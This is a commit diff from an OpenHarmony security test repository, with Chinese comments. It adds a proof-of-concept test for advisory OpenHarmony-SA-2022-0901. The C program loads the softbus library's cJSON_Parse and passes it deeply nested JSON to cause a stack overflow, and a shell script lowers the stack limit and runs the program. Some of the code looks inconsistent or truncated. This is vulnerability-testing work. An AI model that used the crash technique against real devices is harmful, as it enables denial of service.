提交 554fa3d7 编写于 作者: J jingyu123412

提交OpenHarmony-SA-2022-0901动态测试用例

Signed-off-by: Njingyu123412 <1565704822@qq.com>
上级 73319548
/*
/*
* Copyright (c) 2023 Huawei Device Co., Ltd.
*
* Licensed under the Apache License, Version 2.0 (the "License");
......@@ -13,12 +13,44 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// 编译时需要使用-l参数链接cjson共享库
#include <stdio.h>
#include <cjson/cJSON.h>
#include <dlfcn.h>
//#include <memory>
#include <stdio.h>
#include <unistd.h>
/* The cJSON structure: */
typedef struct cJSON
{
struct cJSON *next;
struct cJSON *prev;
struct cJSON *child;
int type;
char *valuestring;
int valueint;
double valuedouble;
char *string;
} cJSON;
int main()
{
void *handle;
// 打开共享库libsoftbus_server.z.so
handle = dlopen("/system/lib/libsoftbus_server.z.so", RTLD_LAZY);
if (!handle)
{
fprintf(stderr, "Error: %s\n", dlerror());
return 1;
}
// 获取函数DisplayManager::GetInstance地址
typedef cJSON* (*Func)(char*);
Func cJSON_Parse = reinterpret_cast<Func>(dlsym(handle, "cJSON_Parse"));
if (cJSON_Parse == NULL) {
fprintf(stderr, "Error: %s\n", dlerror());
dlclose(handle);
return 1;
}
// 准备一个具有900层嵌套结构的json数据
char *json_string = "{\"a}";
......@@ -32,7 +64,8 @@ int main()
}
// 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示
printf("OpenHarmony-SA-2022-0901 : vulnerable\n");
cJSON_Delete(root);
//cJSON_Delete(root);
return 0;
}
......@@ -19,8 +19,5 @@
#或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间
ulimit -s 60
#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置
export LD_LIBRARY_PATH=/data/local/tmp
#运行poc可执行程序
./poc
Markdown is supported
0% .
You are about to add 0 people to the discussion. Proceed with caution.
先完成此消息的编辑!
想要评论请 注册